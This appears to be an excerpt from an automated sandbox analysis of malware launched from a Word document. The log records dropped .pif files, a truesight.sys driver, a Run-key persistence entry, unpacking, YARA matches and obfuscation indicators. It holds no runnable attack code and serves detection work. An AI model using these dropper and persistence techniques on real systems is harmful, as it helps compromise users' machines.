                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntlmshared.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2273558803.000000001A4F6000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2349806215.0000000020806000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.0000000021382000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2124248184.0000000000741000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.0000000000821000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack
                  Source: Yara matchFile source: 7.2.brightness.exe.20f65a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.brightness.exe.27b0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.brightness.exe.20f65a8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2130519568.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000001.2327344722.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3731678723.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3731530309.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.2128731771.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000001.2248691179.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3731782871.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: jphwmyiA.pif.7.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_027C8798
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD2FC push 027DD367h; ret 7_2_027DD35F
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B32FC push eax; ret 7_2_027B3338
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B635A push 027B63B7h; ret 7_2_027B63AF
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B635C push 027B63B7h; ret 7_2_027B63AF
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD0AC push 027DD125h; ret 7_2_027DD11D
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD144 push 027DD1ECh; ret 7_2_027DD1E4
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD1F8 push 027DD288h; ret 7_2_027DD280
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C86B8 push 027C86FAh; ret 7_2_027C86F2
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B6738 push 027B677Ah; ret 7_2_027B6772
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B6736 push 027B677Ah; ret 7_2_027B6772
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BC4EC push ecx; mov dword ptr [esp], edx7_2_027BC4F1
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BD520 push 027BD54Ch; ret 7_2_027BD544
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BCB6C push 027BCCF2h; ret 7_2_027BCCEA
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C68C8 push 027C6973h; ret 7_2_027C696B
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C68C6 push 027C6973h; ret 7_2_027C696B
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C788C push 027C7909h; ret 7_2_027C7901
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA918 push 027CA950h; ret 7_2_027CA948
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA917 push 027CA950h; ret 7_2_027CA948
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8910 push 027C8948h; ret 7_2_027C8940
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C890E push 027C8948h; ret 7_2_027C8940
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CE9E8 push ecx; mov dword ptr [esp], edx7_2_027CE9ED
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BC9CF push 027BCCF2h; ret 7_2_027BCCEA
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2EE0 push 027C2F56h; ret 7_2_027C2F4E
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2FEC push 027C3039h; ret 7_2_027C3031
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2FEB push 027C3039h; ret 7_2_027C3031
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DBFA0 push 027DC1C8h; ret 7_2_027DC1C0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C5DFC push ecx; mov dword ptr [esp], edx7_2_027C5DFE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_3_238787DB push es; iretd 10_3_23878A0E
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041C40C push cs; iretd 10_2_0041C4E2
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00423149 push eax; ret 10_2_00423179
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041C50E push cs; iretd 10_2_0041C4E2
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Aiymwhpj.PIF
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEExecutable created and started: C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Windows \SysWOW64\truesight.sys
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aiymwhpj
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_027CA954
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 20E50000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 21120000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 23120000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 1A400000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 1C1D0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 1BF80000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 223B0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 227E0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Memory allocated: 22420000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Thread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 1102
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 8676
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: foregroundWindowGot 1752
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 6277
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 3508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: foregroundWindowGot 1746
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 7034
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: threadDelayed 2787
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Window / User API: foregroundWindowGot 1763
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027B58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,7_2_027B58B4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599525Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599269Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598838Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598679Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598572Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597869Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597750Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597530Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596839Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596491Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596070Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595625Jump to behavior
